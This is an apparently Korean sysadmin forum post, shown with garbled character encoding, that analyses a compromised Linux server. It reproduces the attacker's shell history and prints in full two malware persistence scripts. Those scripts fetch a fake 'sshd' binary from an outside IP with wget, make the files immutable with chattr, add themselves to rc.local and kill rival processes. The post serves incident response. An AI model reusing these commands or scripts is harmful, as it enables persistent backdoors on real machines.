È£½ºÆà TIP
º¸¾È
½Ã½ºÅÛ
ÇÁ·Î±×·¡¹Ö
³×Æ®¿öÅ©
|
½Ã½ºÅÛº¸¾È
|
DDOS
ÀÌ¿ë¾È³»
|
È£½ºÆà TIP
|
ÀÚÀ¯°Ô½ÃÆÇ
|
ȸ¿ø°¡ÀÔ

¿ù°£ Àα⠰Խù°

°Ô½Ã¹° 111°Ç
   
.linux sshd
±Û¾´ÀÌ : ÃÖ°í°ü¸®ÀÚ ³¯Â¥ : 2015-08-07 (±Ý) 02:41 Á¶È¸ : 4723
±ÛÁÖ¼Ò :
                             

history
  117  2015-08-07_05:02:23\ ifconfig
  118  2015-08-07_05:02:30\ ss
  119  2015-08-07_05:02:37\ cd .ssh
  120  2015-08-07_05:02:40\ ls
  121  2015-08-07_05:03:25\ cat known_hosts
  .............................................
  .............................................
  130  2015-08-07_05:04:40\ cd /bin
  131  2015-08-07_05:04:50\ wget 168.235.251.156:2211/sshd
  132  2015-08-07_05:05:51\ wget 168.235.251.156:2211/.linux
  133  2015-08-07_05:06:26\ chmod +x sshd
  134  2015-08-07_05:06:30\ chmod +x .linux
  135  2015-08-07_05:06:34\ chattr +i .linux
  136  2015-08-07_05:06:39\ chattr +i sshd
  137  2015-08-07_05:06:45\ /bin/.linux &
  138  2015-08-07_05:06:47\ exit

Á¤»ó ÆÄÀÏ ¼Ó¼º
root@xxx:/bin# lsattr pwd
-------------e-- pwd

º¯°æµÈ ÆÄÀÏ ¼Ó¼º
root@xxx:/bin# lsattr .linux 
----i--------e-- .linux
root@xxx:/bin# lsattr sshd 
----i--------e-- sshd

:: ¼öÁ¤
root@xxx:/bin# chattr -i .linux 
root@xxx:/bin# chattr -i sshd 
root@xxx:/bin# lsattr sshd 
-------------e-- sshd
root@xxx:/bin# lsattr .linux 
-------------e-- .linux


sshd ÆÄÀÏÀº ¹ÙÀ̳ʸ® ÆÄÀÏ 

root@xxx:/bin# cat  /bin/.linux
#!/bin/bash

if [ "/bin/.linux &" = "$(cat /etc/init.d/rc.local | grep /bin/.linux | grep -v grep)" ]; then
    echo ""
else
    echo "/bin/.linux &" >> /etc/init.d/rc.local
fi

while [ 1 ]; do
    sshd_killn=$(ps aux | grep "/bin/sshd" | grep -v grep | wc -l)
    if [[ $sshd_killn -eq 0 ]]; then
        if [ ! -f "/bin/sshd" ]; then
            if [ -f "/usr/bin/wget" ]; then
                cp /usr/bin/wget .
                chmod +x wget
                #./wget -P . http://168.235.251.156:2211/sshd
                ./wget -P /bin/  http://168.235.251.156:2211/sshd &> /dev/null
                chmod 755 /bin/sshd
                rm wget -rf
                kill [']netstat -nlp | grep :3699  | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                kill [']netstat -nlp | grep :10999 | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                kill [']netstat -nlp | grep :10777 | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                kill [']netstat -nlp | grep :10771 | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                kill [']netstat -nlp | grep :10711 | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                kill [']netstat -nlp | grep :36001 | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                kill [']netstat -nlp | grep :36000 | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                kill [']netstat -nlp | grep :45000 | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                kill [']netstat -nlp | grep :25000 | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                kill [']netstat -nlp | grep :25001 | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                kill [']netstat -nlp | grep :4201  | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                kill [']netstat -nlp | grep :55555 | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                kill [']netstat -nlp | grep :3699  | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                kill [']netstat -nlp | grep :2849  | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                  kill [']netstat -nlp | grep :2403  | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                  kill [']netstat -nlp | grep :34125 | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                  kill [']netstat -nlp | grep :2500  | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
                  kill [']netstat -nlp | grep :2405  | awk '{print $7}' | awk -F"/" '{ print $1 }'['];
            else
                echo "No wget"
            fi
        fi
        /bin/sshd &
        #./sshd &
    elif [[ $sshd_killn -gt 1 ]]; then
        for killed in $(ps aux | grep "sshd" | grep -v grep | awk '{print $2}'); do
            sshd_killn=$(($sshd_killn-1))
            if [[ $sshd_killn -eq 1 ]]; then
                continue
            else
                kill -9 $killed
            fi
        done
    else
        echo ""
    fi

    sleep 200
done


root@xxx:/bin# cat /etc/linux
#!/bin/bash

if [ "/etc/linux &" = "$(cat /etc/init.d/rc.local | grep /etc/linux | grep -v grep)" ]; then
    echo ""
else
    echo "/etc/linux &" >> /etc/init.d/rc.local
fi

while [ 1 ]; do
    sshd_killn=$(ps aux | grep "/etc/sshd" | grep -v grep | wc -l)
    if [[ $sshd_killn -eq 0 ]]; then
        if [ ! -f "/etc/sshd" ]; then
            if [ -f "/usr/bin/wget" ]; then
                cp /usr/bin/wget .
                chmod +x wget
                #./wget -P . http://168.235.251.156:2211/sshd
                ./wget -P /etc/  http://168.235.251.156:2211/sshd &> /dev/null
                chmod 755 /etc/sshd
                rm wget -rf
            else
                echo "No wget"
            fi
        fi
        /etc/sshd &
        #./sshd &
    elif [[ $sshd_killn -gt 1 ]]; then
        for killed in $(ps aux | grep "sshd" | grep -v grep | awk '{print $2}'); do
            sshd_killn=$(($sshd_killn-1))
            if [[ $sshd_killn -eq 1 ]]; then
                continue
            else
                kill -9 $killed
            fi
        done
    else
        echo ""
    fi

    sleep 60
done


root@xxx:/bin# cat /etc/init.d/rc.local
......................
......................
/etc/linux &
/bin/.linux &

À̸§ Æнº¿öµå
ºñ¹Ð±Û (üũÇÏ¸é ±Û¾´À̸¸ ³»¿ëÀ» È®ÀÎÇÒ ¼ö ÀÖ½À´Ï´Ù.)
¿ÞÂÊÀÇ ±ÛÀÚ¸¦ ÀÔ·ÂÇϼ¼¿ä.
   

 



Àαâ°Ë»ö¾î
ceph
volume
 1
http
 1
DDOS
squid
 1
for
 3
sq
 2
remote
BawjtiCFy
 2
zero
 9
 
»çÀÌÆ®¸í : ¸ðÁö¸®³× | ´ëÇ¥ : ÀÌ°æÇö | °³ÀÎÄ¿¹Â´ÏƼ : ·©Å°´åÄÄ ¿î¿µÃ¼Á¦(OS) | °æ±âµµ ¼º³²½Ã ºÐ´ç±¸ | ÀüÀÚ¿ìÆí : mojily°ñ¹ðÀÌchonnom.com
| ÀÌ¿ë¾à°ü | °³ÀÎÁ¤º¸Ãë±Þ¹æħ | Ã¥ÀÓÀÇÇÑ°è¿Í ¹ýÀû°íÁö | À̸ÞÀϹ«´Ü¼öÁý°ÅºÎ | ÀÌ¿ë¾È³»
Copyright ¨Ï www.chonnom.com www.kyunghyun.net www.mojily.net. All rights reserved.